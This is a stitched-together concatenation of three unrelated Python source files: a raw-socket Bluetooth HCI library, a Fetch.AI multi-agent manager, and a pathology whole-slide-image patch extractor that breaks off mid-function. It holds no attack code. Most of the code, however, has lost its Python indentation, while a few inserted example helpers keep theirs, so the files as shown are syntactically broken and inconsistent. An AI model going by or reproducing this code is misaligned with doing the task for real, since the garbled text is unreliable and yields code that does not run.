# Bluetooth HCI Python library (Experimental)
#
# Pure Python and standard library based module for interacting with the Bluetooth HCI.
# There is no dependency on the PyBluez Python/Native libraries, bluetoothd service or D-Bus.
# This can be considered to be a Pythonisation of the Node.js noble/bleno libraries by Sandeep Mistry.
# Author: Wayne Keenan
# email: wayne@thebubbleworks.com
# Twitter: https://twitter.com/wkeenan
# Acknowledgements:
# Significant information taken from https://github.com/sandeepmistry/node-bluetooth-hci-socket
# With help from https://github.com/colin-guyon/py-bluetooth-utils and the BlueZ Python library.
import array
import struct
import fcntl
import socket
import threading
try:
import thread
except ImportError:
import _thread
from threading import Event
import select
import os
import sys
from .BluetoothSocket import BluetoothSocket
from .constants import *
OGF_HOST_CTL = 0x03
OCF_RESET = 0x0003
# -------------------------------------------------
# Socket HCI transport API
# This is a socket-based transport to the Bluetooth HCI.
# Strong candidate for refactoring into factory pattern to support
# alternate transports (e.g. serial) and easier mocking for automated testing.
class BluetoothHCISocketProvider:
def __init__(self, device_id=0):
self.device_id = device_id
self._keep_running = True
self._socket = None
self._socket_on_data_user_callback = None
self._socket_on_started = None
self._socket_poll_thread = None
self._l2sockets = {}
self._socket = BluetoothSocket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_HCI)
#self._socket = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_HCI)
#self._socket = BluetoothUserSocket()
#self._socket = bluetooth.bluez._gethcisock(0)
self._socket.setblocking(0)
self.__r, self.__w = os.pipe()
self._r = os.fdopen(self.__r, 'rU')
self._w = os.fdopen(self.__w, 'w')
def __del__(self):
self._keep_running = False
def open(self):
# TODO: specify channel: HCI_CHANNEL_RAW, HCI_CHANNEL_USER, HCI_CHANNEL_CONTROL
# https://www.spinics.net/lists/linux-bluetooth/msg37345.html
# self._socket.bind((self.device_id,))
HCI_CHANNEL_RAW = 0
HCI_CHANNEL_USER = 1
self._socket.bind_hci(self.device_id, HCI_CHANNEL_RAW)
#self._socket2.bind_l2(0, "0B:D8:28:EB:27:B8", cid=ATT_CID, addr_type=1)
#self._socket2.connect_l2(0, "0B:D8:28:EB:27:B8", cid=ATT_CID, addr_type=1)
#self.reset()
self._socket_poll_thread = threading.Thread(target=self._socket_poller, name='HCISocketPoller')
self._socket_poll_thread.setDaemon(True)
self._socket_poll_thread.start()
def kernel_disconnect_workarounds(self, data):
#print 'PRE KERNEL WORKAROUND %d' % len(data)
def noop(value):
return value
if (sys.version_info > (3, 0)):
ord = noop
else:
import __builtin__
ord = __builtin__.ord
if len(data) == 22 and [ord(elem) for elem in data[0:5]] == [0x04, 0x3e, 0x13, 0x01, 0x00]:
handle = ord(data[5])
# get address
set = data[9:15]
# get device info
dev_info = self.get_device_info()
raw_set = [ord(c) for c in set]
raw_set.reverse()
#addz = ''.join([hex(c) for c in set])
#set.reverse()
addz = "%02x:%02x:%02x:%02x:%02x:%02x" % struct.unpack("BBBBBB", array.array('B', raw_set))
socket2 = BluetoothSocket(socket.AF_BLUETOOTH, socket.SOCK_SEQPACKET, socket.BTPROTO_L2CAP)
socket2.bind_l2(0, dev_info['addr'], cid=ATT_CID, addr_type=0)#addr_type=dev_info['type'])
self._l2sockets[handle] = socket2
try:
result = socket2.connect_l2(0, addz, cid=ATT_CID, addr_type=ord(data[8]) + 1)
except:
pass
elif len(data) == 7 and [ord(elem) for elem in data[0:4]] == [0x04, 0x05, 0x04, 0x00]:
handle = ord(data[4])
socket2 = self._l2sockets[handle] if handle in self._l2sockets else None
if socket2:
# print 'GOT A SOCKET!'
socket2.close()
del self._l2sockets[handle]
def reset(self):
cmd = array.array('B', [0] * 4)
# // header
# cmd.writeUInt8(HCI_COMMAND_PKT, 0);
# cmd.writeUInt16LE(OCF_RESET | OGF_HOST_CTL << 10, 1);
# // length
# cmd.writeUInt8(0x00, 3);
struct.pack_into("<BHB", cmd, 0, HCI_COMMAND_PKT, OCF_RESET | OGF_HOST_CTL << 10, 0x00)
#debug('reset');
self.write_buffer(cmd)
def close(self):
self._socket.close()
def send_cmd(self, cmd, data):
arr = array.array('B', data)
fcntl.ioctl(self._socket.fileno(), cmd, arr)
return arr
def send_cmd_value(self, cmd, value):
fcntl.ioctl(self._socket.fileno(), cmd, value)
def write_buffer(self, data):
self._socket.send(data)
def set_filter(self, data):
# flt = bluez.hci_filter_new()
# bluez.hci_filter_all_events(flt)
# bluez.hci_filter_set_ptype(flt, bluez.HCI_EVENT_PKT)
self._socket.setsockopt( socket.SOL_HCI, socket.HCI_FILTER, data )
pass
#self._socket.setsockopt(socket.SOL_HCI, socket.HCI_FILTER, data)
def invoke(self, callback):
event = Event()
self._msg = (event, callback)
self._w.write(" ")
event.wait()
def _socket_poller(self):
if self._socket_on_started:
self._socket_on_started()
while self._keep_running:
readable, writable, exceptional = select.select([self._socket, self._r], [], [])
for s in readable:
if s == self._r:
self._r.read(1)
self._msg[1]()
self._msg[0].set()
self._msg = None
elif s == self._socket:
data = self._socket.recv(1024) # blocking
self.kernel_disconnect_workarounds(data)
if self._socket_on_data_user_callback:
self._socket_on_data_user_callback(bytearray(data))
def on_started(self, callback):
self._socket_on_started = callback
def on_data(self, callback):
self._socket_on_data_user_callback = callback
def get_device_info(self):
# C hci_dev_info struct defined at https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/lib/hci.h#n2382
hci_dev_info_struct = struct.Struct('=H 8s 6B L B 8B 3L 4I 10L')
request_dta = hci_dev_info_struct.pack(
self.device_id,
b'',
0, 0, 0, 0, 0, 0,
0,
0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
response_data = self.send_cmd(HCIGETDEVINFO, request_dta)
hci_dev_info = hci_dev_info_struct.unpack(response_data)
# Just extract a few parts for now
device_id = hci_dev_info[0]
device_name = hci_dev_info[1].split(b'\0',1)[0]
bd_addr = "%0x:%0x:%0x:%0x:%0x:%0x" % hci_dev_info[7:1:-1]
type = hci_dev_info[4]
return dict(id=device_id,
name=device_name,
addr=bd_addr,
type=type)
class BluetoothHCI:
def __init__(self, device_id=0, auto_start = True):
# TODO: be given a provider interface from a factory (e.g. socket, serial, mock)
self.hci = BluetoothHCISocketProvider(device_id)
if auto_start:
self.start()
# -------------------------------------------------
# Public HCI API, simply delegates to the composite HCI provider
def start(self):
self.hci.open()
def stop(self):
self.hci.close()
def on_started(self, callback):
self.hci.on_started(callback)
def invoke(self, callback):
self.hci.invoke(callback)
def send_cmd(self, cmd, data):
return self.hci.send_cmd(cmd, data)
# packet type struct : https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/lib/hci.h#n117
# typedef struct {
# uint16_t opcode; /* OCF & OGF */
# uint8_t plen;
# } __attribute__ ((packed)) hci_command_hdr;
# Op-code (16 bits): identifies the command:
# OGF (Op-code Group Field, most significant 6 bits);
# OCF (Op-code Command Field, least significant 10 bits)."""
def send_cmd_value(self, cmd, value):
self.hci.send_cmd_value(cmd, value)
def write(self, data):
self.hci.write_buffer(data)
def set_filter(self, data):
#self.device_down()
self.hci.set_filter(data)
#self.device_up()
def on_data(self, callback):
self.hci.on_data(callback)
# -------------------------------------------------
# Public HCI Convenience API
def device_up(self):
self.send_cmd_value(HCIDEVUP, self.hci.device_id)
def device_down(self):
self.send_cmd_value(HCIDEVDOWN, self.hci.device_id)
def get_device_info(self):
# C hci_dev_info struct defined at https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/lib/hci.h#n2382
hci_dev_info_struct = struct.Struct('=H 8s 6B L B 8B 3L 4I 10L')
request_dta = hci_dev_info_struct.pack(
self.hci.device_id,
b'',
0, 0, 0, 0, 0, 0,
0,
0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
response_data = self.send_cmd(HCIGETDEVINFO, request_dta)
hci_dev_info = hci_dev_info_struct.unpack(response_data)
# Just extract a few parts for now
device_id = hci_dev_info[0]
device_name = hci_dev_info[1].split(b'\0',1)[0]
bd_addr = "%0x:%0x:%0x:%0x:%0x:%0x" % hci_dev_info[7:1:-1]
return dict(id=device_id,
name=device_name,
addr=bd_addr)
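# Hedged sketch of the opcode layout noted in the comments inside BluetoothHCI
# above: opcode = OGF << 10 | OCF, followed by a one-byte parameter length.
# HCI_COMMAND_PKT is assumed to be 0x01 here; the OGF/OCF values are examples.
def _build_hci_command_example(ogf=OGF_HOST_CTL, ocf=OCF_RESET, params=b''):
    """Pack an HCI command header (packet type, opcode, parameter length)."""
    opcode = (ogf << 10) | ocf
    return struct.pack('<BHB', 0x01, opcode, len(params)) + params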
|
manager.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2020 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the implementation of AEA agents manager."""
import asyncio
import json
import os
import threading
from asyncio.tasks import FIRST_COMPLETED
from shutil import rmtree
from threading import Thread
from typing import Any, Callable, Dict, List, Optional, Set, Tuple
from aea.aea import AEA
from aea.configurations.constants import DEFAULT_REGISTRY_NAME
from aea.configurations.data_types import PublicId
from aea.manager.project import AgentAlias, Project
class AgentRunAsyncTask:
"""Async task wrapper for agent."""
def __init__(self, agent: AEA, loop: asyncio.AbstractEventLoop) -> None:
"""Init task with agent and loop."""
self.run_loop: asyncio.AbstractEventLoop = loop
self.caller_loop: asyncio.AbstractEventLoop = loop
self._done_future: Optional[asyncio.Future] = None
self.task: Optional[asyncio.Task] = None
self.agent = agent
def create_run_loop(self) -> None:
"""Create run loop."""
def start(self) -> None:
"""Start task."""
self.create_run_loop()
self.task = self.run_loop.create_task(self._run_wrapper())
self._done_future = asyncio.Future(loop=self.caller_loop)
def wait(self) -> asyncio.Future:
"""Return future to wait task completed."""
if not self._done_future: # pragma: nocover
raise ValueError("Task not started!")
return self._done_future
def stop(self) -> None:
"""Stop task."""
if not self.run_loop or not self.task: # pragma: nocover
raise ValueError("Task was not started!")
self.run_loop.call_soon_threadsafe(self.task.cancel)
async def _run_wrapper(self) -> None:
"""Run task internals."""
if not self._done_future: # pragma: nocover
raise ValueError("Task was not started! please use start method")
exc = None
try:
await self.run()
except asyncio.CancelledError: # pragma: nocover
pass
except Exception as e: # pylint: disable=broad-except
exc = e
finally:
self.caller_loop.call_soon_threadsafe(self._set_result, exc)
def _set_result(self, exc: Optional[BaseException]) -> None:
"""Set result of task execution."""
if not self._done_future or self._done_future.done(): # pragma: nocover
return
if exc:
self._done_future.set_exception(exc)
else:
self._done_future.set_result(None)
async def run(self) -> None:
"""Run task body."""
self.agent.runtime.set_loop(self.run_loop)
await self.agent.runtime.run()
@property
def is_running(self) -> bool:
"""Return is task running."""
return not self.wait().done()
class AgentRunThreadTask(AgentRunAsyncTask):
"""Threaded wrapper to run agent."""
def __init__(self, agent: AEA, loop: asyncio.AbstractEventLoop) -> None:
"""Init task with agent and loop."""
AgentRunAsyncTask.__init__(self, agent, loop)
self._thread: Optional[Thread] = None
def create_run_loop(self) -> None:
"""Create run loop."""
self.run_loop = asyncio.new_event_loop()
def start(self) -> None:
"""Run task in a dedicated thread."""
super().start()
self._thread = threading.Thread(
target=self.run_loop.run_until_complete, args=[self.task], daemon=True
)
self._thread.start()
class MultiAgentManager:
"""Multi agents manager."""
MODES = ["async", "threaded"]
DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS = 60
SAVE_FILENAME = "save.json"
def __init__(
self,
working_dir: str,
mode: str = "async",
registry_path: str = DEFAULT_REGISTRY_NAME,
) -> None:
"""
Initialize manager.
:param working_dir: directory to store base agents.
"""
self.working_dir = working_dir
self._save_path = os.path.join(self.working_dir, self.SAVE_FILENAME)
self.registry_path = registry_path
self._was_working_dir_created = False
self._is_running = False
self._projects: Dict[PublicId, Project] = {}
self._versionless_projects_set: Set[PublicId] = set()
self._keys_dir = os.path.abspath(os.path.join(self.working_dir, "keys"))
self._agents: Dict[str, AgentAlias] = {}
self._agents_tasks: Dict[str, AgentRunAsyncTask] = {}
self._thread: Optional[Thread] = None
self._loop: Optional[asyncio.AbstractEventLoop] = None
self._event: Optional[asyncio.Event] = None
self._error_callbacks: List[Callable[[str, BaseException], None]] = []
if mode not in self.MODES:
raise ValueError(
f'Invalid mode {mode}. Valid modes are {", ".join(self.MODES)}'
)
self._started_event = threading.Event()
self._mode = mode
@property
def is_running(self) -> bool:
"""Is manager running."""
return self._is_running
@property
def dict_state(self) -> Dict[str, Any]:
"""Create MultiAgentManager dist state."""
return {
"projects": [str(public_id) for public_id in self._projects.keys()],
"agents": [alias.dict for alias in self._agents.values()],
}
def _run_thread(self) -> None:
"""Run internal thread with own event loop."""
self._loop = asyncio.new_event_loop()
self._event = asyncio.Event(loop=self._loop)
self._loop.run_until_complete(self._manager_loop())
async def _manager_loop(self) -> None:
"""Await and control running manager."""
if not self._event: # pragma: nocover
raise ValueError("Do not use this method directly, use start_manager.")
self._started_event.set()
while self._is_running:
agents_run_tasks_futures = {
task.wait(): agent_name
for agent_name, task in self._agents_tasks.items()
}
wait_tasks = list(agents_run_tasks_futures.keys()) + [self._event.wait()] # type: ignore
done, _ = await asyncio.wait(wait_tasks, return_when=FIRST_COMPLETED)
if self._event.is_set():
self._event.clear()
for task in done:
if task not in agents_run_tasks_futures:
# task not in agents_run_tasks_futures, so it's event_wait, skip it
await task
continue
agent_name = agents_run_tasks_futures[task]
self._agents_tasks.pop(agent_name)
if task.exception():
for callback in self._error_callbacks:
callback(agent_name, task.exception())
else:
await task
def add_error_callback(
self, error_callback: Callable[[str, BaseException], None]
) -> None:
"""Add error callback to call on error raised."""
self._error_callbacks.append(error_callback)
def start_manager(self, local: bool = True) -> "MultiAgentManager":
"""Start manager."""
if self._is_running:
return self
self._ensure_working_dir()
self._load_state(local=local)
self._started_event.clear()
self._is_running = True
self._thread = Thread(target=self._run_thread, daemon=True)
self._thread.start()
self._started_event.wait(self.DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS)
return self
def stop_manager(
self, cleanup: bool = True, save: bool = False
) -> "MultiAgentManager":
"""
Stop manager.
Stops all running agents, then stops the manager itself.
:param cleanup: whether to clean up the working directory on stop.
:param save: whether to save the state to file on stop.
:return: None
"""
if not self._is_running:
return self
if not self._loop or not self._event or not self._thread: # pragma: nocover
raise ValueError("Manager was not started!")
if not self._thread.is_alive(): # pragma: nocover
return self
self.stop_all_agents()
if save:
self._save_state()
for agent_name in self.list_agents():
self.remove_agent(agent_name)
if cleanup:
for project in list(self._projects.keys()):
self.remove_project(project, keep_files=save)
self._cleanup(only_keys=save)
self._is_running = False
self._loop.call_soon_threadsafe(self._event.set)
if self._thread.ident != threading.get_ident():
self._thread.join(self.DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS)
self._thread = None
return self
def _cleanup(self, only_keys: bool = False) -> None:
"""Remove workdir if was created."""
if only_keys:
rmtree(self._keys_dir)
else:
if self._was_working_dir_created and os.path.exists(self.working_dir):
rmtree(self.working_dir)
def add_project(
self, public_id: PublicId, local: bool = True, restore: bool = False
) -> "MultiAgentManager":
"""
Fetch agent project and all dependencies to working_dir.
:param public_id: the public id of the agent project.
:param local: whether or not to fetch from local registry.
:param restore: bool flag for restoring already fetched agent.
"""
if public_id.to_any() in self._versionless_projects_set:
raise ValueError(
f"The project ({public_id.author}/{public_id.name}) was already added!"
)
self._versionless_projects_set.add(public_id.to_any())
project = Project.load(
self.working_dir,
public_id,
local,
registry_path=self.registry_path,
is_restore=restore,
)
if not restore:
project.install_pypi_dependencies()
project.build()
self._projects[public_id] = project
return self
def remove_project(
self, public_id: PublicId, keep_files: bool = False
) -> "MultiAgentManager":
"""Remove agent project."""
if public_id not in self._projects:
raise ValueError(f"Project {public_id} is not present!")
if self._projects[public_id].agents:
raise ValueError(
f"Can not remove projects with aliases exists: {self._projects[public_id].agents}"
)
project = self._projects.pop(public_id)
self._versionless_projects_set.remove(public_id.to_any())
if not keep_files:
project.remove()
return self
def list_projects(self) -> List[PublicId]:
"""
List all agents projects added.
:return: list of public ids of projects
"""
return list(self._projects.keys())
def add_agent(
self,
public_id: PublicId,
agent_name: Optional[str] = None,
agent_overrides: Optional[dict] = None,
component_overrides: Optional[List[dict]] = None,
) -> "MultiAgentManager":
"""
Create new agent configuration based on project with config overrides applied.
Alias is stored in memory only!
:param public_id: base agent project public id
:param agent_name: unique name for the agent
:param agent_overrides: overrides for agent config.
:param component_overrides: overrides for component section.
:return: manager
"""
agent_name = agent_name or public_id.name
if agent_name in self._agents:
raise ValueError(f"Agent with name {agent_name} already exists!")
if public_id not in self._projects:
raise ValueError(f"{public_id} project is not added!")
project = self._projects[public_id]
agent_alias = AgentAlias(
project=project, agent_name=agent_name, keys_dir=self._keys_dir,
)
agent_alias.set_overrides(agent_overrides, component_overrides)
project.agents.add(agent_name)
self._agents[agent_name] = agent_alias
return self
def add_agent_with_config(
self, public_id: PublicId, config: List[dict], agent_name: Optional[str] = None,
) -> "MultiAgentManager":
"""
Create new agent configuration based on project with config provided.
Alias is stored in memory only!
:param public_id: base agent project public id
:param agent_name: unique name for the agent
:param config: agent config (used for agent re-creation).
:return: manager
"""
agent_name = agent_name or public_id.name
if agent_name in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} already exists!")
if public_id not in self._projects: # pragma: nocover
raise ValueError(f"{public_id} project is not added!")
project = self._projects[public_id]
agent_alias = AgentAlias(
project=project, agent_name=agent_name, keys_dir=self._keys_dir,
)
agent_alias.set_agent_config_from_data(config)
project.agents.add(agent_name)
self._agents[agent_name] = agent_alias
return self
def get_agent_overridables(self, agent_name: str) -> Tuple[Dict, List[Dict]]:
"""
Get agent config overridables.
:param agent_name: str
:return: Tuple of agent overridables dict and list of component overridables dicts.
"""
if agent_name not in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} does not exist!")
return self._agents[agent_name].get_overridables()
def set_agent_overrides(
self,
agent_name: str,
agent_overides: Optional[Dict],
components_overrides: Optional[List[Dict]],
) -> None:
"""
Set agent overrides.
:param agent_name: str
:param agent_overides: optional dict of agent config overrides
:param components_overrides: optional list of dict of components overrides
:return: None
"""
if agent_name not in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} does not exist!")
if self._is_agent_running(agent_name): # pragma: nocover
raise ValueError("Agent is running. stop it first!")
self._agents[agent_name].set_overrides(agent_overides, components_overrides)
def list_agents_info(self) -> List[Dict[str, Any]]:
"""
List agents detailed info.
:return: list of dicts that represents agent info: public_id, name, is_running.
"""
return [
{
"agent_name": agent_name,
"public_id": str(alias.project.public_id),
"is_running": self._is_agent_running(agent_name),
}
for agent_name, alias in self._agents.items()
]
def list_agents(self, running_only: bool = False) -> List[str]:
"""
List all agents.
:param running_only: returns only running if set to True
:return: list of agents names
"""
if running_only:
return [i for i in self._agents.keys() if self._is_agent_running(i)]
return list(self._agents.keys())
def remove_agent(self, agent_name: str) -> "MultiAgentManager":
"""
Remove agent alias definition from registry.
:param agent_name: agent name to remove
:return: None
"""
if agent_name not in self._agents:
raise ValueError(f"Agent with name {agent_name} does not exist!")
if self._is_agent_running(agent_name):
raise ValueError("Agent is running. stop it first!")
agent_alias = self._agents.pop(agent_name)
agent_alias.remove_from_project()
return self
def start_agent(self, agent_name: str) -> "MultiAgentManager":
"""
Start selected agent.
:param agent_name: agent name to start
:return: None
"""
if not self._loop or not self._event: # pragma: nocover
raise ValueError("agent is not started!")
agent_alias = self._agents.get(agent_name)
if not agent_alias:
raise ValueError(f"{agent_name} is not registered!")
if self._is_agent_running(agent_name):
raise ValueError(f"{agent_name} is already started!")
agent_alias.issue_certificates()
aea = agent_alias.get_aea_instance()
# override build dir to project's one
aea.DEFAULT_BUILD_DIR_NAME = os.path.join(
agent_alias.project.path, aea.DEFAULT_BUILD_DIR_NAME
)
if self._mode == "async":
task = AgentRunAsyncTask(aea, self._loop)
elif self._mode == "threaded":
task = AgentRunThreadTask(aea, self._loop)
task.start()
self._agents_tasks[agent_name] = task
self._loop.call_soon_threadsafe(self._event.set)
return self
def _is_agent_running(self, agent_name: str) -> bool:
"""Return is agent running state."""
if agent_name not in self._agents_tasks:
return False
task = self._agents_tasks[agent_name]
return task.is_running
def start_all_agents(self) -> "MultiAgentManager":
"""
Start all not started agents.
:return: None
"""
self.start_agents(
[
agent_name
for agent_name in self.list_agents()
if not self._is_agent_running(agent_name)
]
)
return self
def stop_agent(self, agent_name: str) -> "MultiAgentManager":
"""
Stop running agent.
:param agent_name: agent name to stop
:return: None
"""
if not self._is_agent_running(agent_name) or not self._thread or not self._loop:
raise ValueError(f"{agent_name} is not running!")
agent_task = self._agents_tasks[agent_name]
if self._thread.ident == threading.get_ident(): # pragma: nocover
# In same thread do not perform blocking operations!
agent_task.stop()
return self
wait_future = agent_task.wait()
event = threading.Event()
def event_set(*args): # pylint: disable=unused-argument
event.set()
def _add_cb():
if wait_future.done():
event_set() # pragma: nocover
else:
wait_future.add_done_callback(event_set)  # pragma: nocover
self._loop.call_soon_threadsafe(_add_cb)
agent_task.stop()
event.wait(self.DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS)
return self
def stop_all_agents(self) -> "MultiAgentManager":
"""
Stop all agents running.
:return: None
"""
agents_list = self.list_agents(running_only=True)
self.stop_agents(agents_list)
return self
def stop_agents(self, agent_names: List[str]) -> "MultiAgentManager":
"""
Stop specified agents.
:return: None
"""
for agent_name in agent_names:
if not self._is_agent_running(agent_name):
raise ValueError(f"{agent_name} is not running!")
for agent_name in agent_names:
self.stop_agent(agent_name)
return self
def start_agents(self, agent_names: List[str]) -> "MultiAgentManager":
"""
Start specified agents.
:return: None
"""
for agent_name in agent_names:
self.start_agent(agent_name)
return self
def get_agent_alias(self, agent_name: str) -> AgentAlias:
"""
Return details about agent alias definition.
:return: AgentAlias
"""
if agent_name not in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} does not exist!")
return self._agents[agent_name]
def _ensure_working_dir(self) -> None:
"""Create working dir if needed."""
if not os.path.exists(self.working_dir):
os.makedirs(self.working_dir)
self._was_working_dir_created = True
if not os.path.isdir(self.working_dir): # pragma: nocover
raise ValueError(f"{self.working_dir} is not a directory!")
if not os.path.exists(self._keys_dir):
os.makedirs(self._keys_dir)
def _load_state(self, local: bool) -> None:
"""
Load saved state from file.
:param local: whether to use the local registry when re-creating projects and agents.
:return: None
:raises: ValueError if failed to load state.
"""
if not os.path.exists(self._save_path):
return
save_json = {}
with open(self._save_path) as f:
save_json = json.load(f)
if not save_json:
return # pragma: nocover
try:
for public_id in save_json["projects"]:
self.add_project(
PublicId.from_str(public_id), local=local, restore=True
)
for agent_settings in save_json["agents"]:
self.add_agent_with_config(
public_id=PublicId.from_str(agent_settings["public_id"]),
agent_name=agent_settings["agent_name"],
config=agent_settings["config"],
)
except ValueError as e: # pragma: nocover
raise ValueError(f"Failed to load state. {e}")
def _save_state(self) -> None:
"""
Save MultiAgentManager state.
:return: None.
"""
with open(self._save_path, "w") as f:
json.dump(self.dict_state, f, indent=4, sort_keys=True)
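# Hedged usage sketch for MultiAgentManager; the project id, agent name and
# working directory are hypothetical and only illustrate the call order
# described above (add_project -> add_agent -> start_agent -> stop_manager).
def _run_manager_example():
    manager = MultiAgentManager("/tmp/mam_example", mode="async")
    manager.start_manager()
    try:
        project_id = PublicId.from_str("fetchai/my_first_aea:0.1.0")
        manager.add_project(project_id)
        manager.add_agent(project_id, agent_name="my_agent")
        manager.start_agent("my_agent")
    finally:
        manager.stop_manager()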
|
patch_extractor.py
|
import os
import numpy as np
import glob
import fire
import xml.etree.ElementTree as ET
from PIL import Image
from openslide import open_slide
import pandas as pd
from multiprocessing import Process
class BTPatchExtractor:
def __init__(self, file_path: str, output_path: str, asap_xml_path: str, overwrite: bool = False,
hotspot: bool = False, level: int = 0, lymph_patch_size: int = 300, tb_patch_size: int = 300,
matched_files_excel: str = None, n_threads=6):
"""
This Object extracts (patches of) an mrxs file to a png format.
:param file_path: string
path to the mrxs single file or folder of files.
:param output_path: string
path to the output folder. The output format is the same name as the mrxs file,
with an appendix if multiple patches are extracted.
:param asap_xml_path: string (optional)
Path to the coordinate xml files (created with ASAP) single file or folder of files
If not provided, the full image is converted into a png.
:param overwrite: bool (optional)
overrides existing extracted patches (default is False)
:param hotspot: bool (optional)
set if hotspot should also be extracted (default False)
:param lymph_patch_size: int (optional)
size of the patch around the lymphocyte coordinates
:param tb_patch_size: int (optional)
size of the patch around the tumor bud coordinates
:param level: int (optional)
Level of the mrxs file that should be used for the conversion (default is 0).
:param matched_files_excel: str
Optional. If provided, this file will be used to match the xmls to the mrxs file names
(the expected sheet and column names are configured in self.matched_excel_info)
"""
# initiate the mandatory elements
self.file_path = file_path
self.output_path = output_path
# instantiate optional parameters
self.coord_path = asap_xml_path
self.overwrite = overwrite
self.staining = 'CD8'
self.level = level
self.matched_files_excel = matched_files_excel
self.extract_hotspot = hotspot
self.lymph_patch_size = lymph_patch_size
self.tb_patch_size = tb_patch_size
self.n_threads = n_threads
self.groups = ['tumorbuds', 'lymphocytes', 'hotspot'] if self.extract_hotspot else ['tumorbuds', 'lymphocytes']
self.matched_excel_info = {'wsi_col': 'CD8 Filename', 'file_id_col': 'Algo coordinates text file ID', 'sheet_name': 'Masterfile',
'folder_col': 'Folder'}
@property
def output_path(self):
return self._output_path
@output_path.setter
def output_path(self, output_path):
# make the output folder if it does not exist
if not os.path.isdir(output_path):
os.makedirs(output_path)
self._output_path = output_path
@property
def wsi_files(self):
if os.path.isdir(self.file_path):
# if we have a matched excel
if self.matched_files_excel:
files = self.file_path
else:
files = glob.glob(os.path.join(self.file_path, f'*{self.staining}.mrxs')) + glob.glob(os.path.join(self.file_path, f'*{self.staining}.ndpi'))
return files
# if we have just a single file
elif os.path.isfile(self.file_path):
return [self.file_path]
@property
def coord_files(self):
if os.path.isdir(self.file_path):
# if we have a matched excel
if self.matched_files_excel:
files = self.coord_path
else:
files = glob.glob(os.path.join(self.coord_path, f'*{self.staining}*asap.xml'))
return files
# if we have just a single file
elif os.path.isfile(self.file_path):
return [self.coord_path]
@property
def files_to_process(self):
if self.matched_files_excel:
return self._get_matched_files_excel()
else:
# we only have one file to process
if len(self.wsi_files) == 1:
filename = os.path.splitext(os.path.basename(self.file_path))[0]
output_folder = os.path.join(self.output_path, filename)
# skip if overwrite = False and folder exists
if not self.overwrite and os.path.isdir(output_folder):
print(f'Folder {output_folder} already exists. Output saving is skipped. To overwrite add --overwrite.')
else:
return [(output_folder, self.file_path, self.coord_path)]
# we have multiple files to process
else:
# create a list of the paired mrxs and coordinate files
# only take files that have a corresponding coordinates file
files_to_process = []
for wsi_path in self.wsi_files:
filename = os.path.splitext(os.path.basename(wsi_path))[0]
output_folder = os.path.join(self.output_path, filename)
# skip if overwrite = False and folder exists
if not self.overwrite and os.path.isdir(output_folder):
print(
f'Folder {output_folder} already exists. Output saving is skipped. To overwrite add --overwrite.')
continue
checked = []
for coord_file in self.coord_files:
if filename in coord_file:
checked.append(coord_file)
if len(checked) != 1:
print(
                            f'File {filename}.mrxs has no or multiple corresponding xml files. File will be skipped.')
else:
files_to_process.append((output_folder, wsi_path, checked.pop()))
return files_to_process
def _get_matched_files_excel(self):
files_to_process = []
df = self.parse_matched_files_excel()
error = []
for wsi_file, wsi_folder, xml_name in zip(df[self.matched_excel_info['wsi_col']],
df[self.matched_excel_info['folder_col']],
df[self.matched_excel_info['file_id_col']]):
output_files_folder_path = os.path.join(self.output_path, f'{xml_name}-level{self.level}')
wsi_path = os.path.join(self.wsi_files, os.path.join(wsi_folder, wsi_file))
xml_coord_path = os.path.join(self.coord_files, f'{xml_name}_output_asap.xml')
# check if files listed in excel actually exist
if not os.path.isfile(wsi_path):
print(f'WSI {wsi_path} not found (skipping file)')
error.append(wsi_path)
continue
if not os.path.isfile(xml_coord_path):
print(f'XML {xml_coord_path} not found (skipping file)')
error.append(xml_coord_path)
continue
            # skip if the output folder already exists and overwrite = False
            if not self.overwrite and os.path.isdir(output_files_folder_path):
print(
f'File {output_files_folder_path} already exists. Output saving is skipped. To overwrite add --overwrite.')
continue
files_to_process.append((output_files_folder_path, wsi_path, xml_coord_path))
return files_to_process
def process_files(self):
# process the files with coordinates
chunks = np.array_split(self.files_to_process, self.n_threads)
prcs = []
for c in chunks:
p = Process(target=self.process_chunk, args=(c,))
p.start()
prcs.append(p)
[pr.join() for pr in prcs]
def process_chunk(self, chunk):
for c in chunk:
output_folder_path, wsi_path, coord_path = tuple(c)
# make the output folder if it does not exist
if not os.path.isdir(output_folder_path):
os.makedirs(output_folder_path)
# open the wsi and get the coordinates
wsi_img = open_slide(wsi_path)
group_coordinates = self.parse_xml(coord_path)
# iterate over the objects
for group, coords in group_coordinates.items():
for id, coord in coords:
# TODO: add coordinates to patch file
output_file_path = os.path.join(output_folder_path,
f'{os.path.basename(output_folder_path)}_{group}_{id}_{"-".join([str(i) for i in coord])}.png')
# extract the patch
top_left_coord, size = self.get_rectangle_info(coord, group)
png = self.extract_crop(wsi_img, top_left_coord, size)
# save the image
print(f'Saving image {output_file_path}')
Image.fromarray(png[:, :, :3]).save(output_file_path)
def get_rectangle_info(self, asap_coord, group):
if group == 'hotspot':
            top_left_coord = [int(i) for i in asap_coord[0]]
